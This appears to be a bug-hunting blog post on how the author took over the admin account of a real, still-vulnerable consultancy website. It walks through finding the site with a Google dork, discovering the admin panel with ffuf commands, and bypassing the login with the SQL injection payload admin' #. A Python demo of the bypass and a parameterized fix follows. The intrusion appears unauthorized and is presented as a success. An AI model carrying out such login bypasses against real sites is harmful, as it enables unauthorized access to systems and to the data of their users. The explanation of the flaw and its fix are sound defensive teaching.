How Hackers Take Over a Website Admin Account.

Hi Hunters, I hope you are all doing well. In this post I will show you how attackers log in to an admin account without knowing the username or password. The flaw behind it is an authentication-bypass SQL injection (often called "Auth SQL").



What is Auth SQL Injection

Authentication-bypass SQL injection is SQL injection aimed at a login form. The application builds its login query by concatenating the submitted username and password straight into a SQL string, so an attacker who types SQL syntax into those fields changes the logic of the query itself: for example, closing the quoted username and commenting out the password check so the database returns the admin row without a valid password. The same mistake lets a malicious user read or modify other data in the application's database.

Reproduce

How I took over the admin account.

Step 1. First I found a doctor's consultancy website using a Google dork. I can't name the site because the vulnerability is still present, so for this post we will call it target.com.


Step 2. After reaching the website, my next task was to find its admin login panel. For this I used ffuf, a tool for discovering web directories:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://www.target.com/FUZZ


After fuzzing we found some web directories, as you can see in the image below.


Step 3. Among the results was a directory named /dec. Adding it to the URL, http://target.com/dec, showed that there is no admin panel at that level, as you can see in the image below.



Step 4. Since the admin panel was not there, we fuzzed the new directory, http://target.com/dec/, again:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://www.target.com/dec/FUZZ


This time the fuzzing turned up the admin directory, as you can see in the image below.


Step 5. Having found the admin directory, I immediately appended it to the previous URL, http://target.com/dec/admin, and got the admin login page.


Step 6. On the admin login page I first tried default credentials such as admin / password, with no luck. Then I tried an authentication-bypass SQL injection payload as the username:

admin' #

The single quote closes the string literal holding the username, and # starts a comment in MySQL-style SQL, so everything after it, including the AND password = '...' check, is discarded by the database. The login succeeded and I was inside the admin account with full control.
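The following is an added example, not code from the original post or from the affected site, showing the mechanism behind the definition above and the admin' # payload in Step 6. It uses a constructed in-memory SQLite database with an invented users table and invented credentials. SQLite does not accept # as a comment marker, so the executed bypass uses the -- form that SQLite understands; render_query shows the exact text the MySQL-style admin' # payload produces. The parameterized safe_login alongside it is the fix.

```python
import sqlite3


def make_db():
    """Constructed sample database: a users table with an admin and a normal user.
    Passwords are stored in plain text here only to keep the bypass easy to follow;
    a real application would store a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!Pass", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def render_query(username, password):
    """The vulnerable pattern: user input concatenated into the SQL text.
    With username "admin' #" the result is
    SELECT username FROM users WHERE username = 'admin' #' AND password = '...'
    and a MySQL server treats everything after # as a comment."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def vulnerable_login(conn, username, password):
    """Runs the concatenated query. Returns the matched username or None.
    A username of "admin' -- " (SQLite's comment syntax, equivalent to the
    post's "admin' #" on MySQL) comments out the password check entirely."""
    row = conn.execute(render_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver sends the values separately
    from the SQL text, so quotes and comment markers in the input are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' -- "
    print(render_query("admin' #", "anything"))
    print(vulnerable_login(db, payload, "anything"))  # admin
    print(safe_login(db, payload, "anything"))        # None
```

Run it as a script to see the rendered query and both outcomes; the bypass works against vulnerable_login with any password, while safe_login only accepts the real credentials.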



Impact:

This vulnerability is critical: the attacker gains full control of the admin account and can delete, add or modify any user, and through it has complete control of the website.

I hope you enjoyed this post and learned something new. Happy Hacking.

If anything in this post was unclear, I have provided a video below that you can watch.


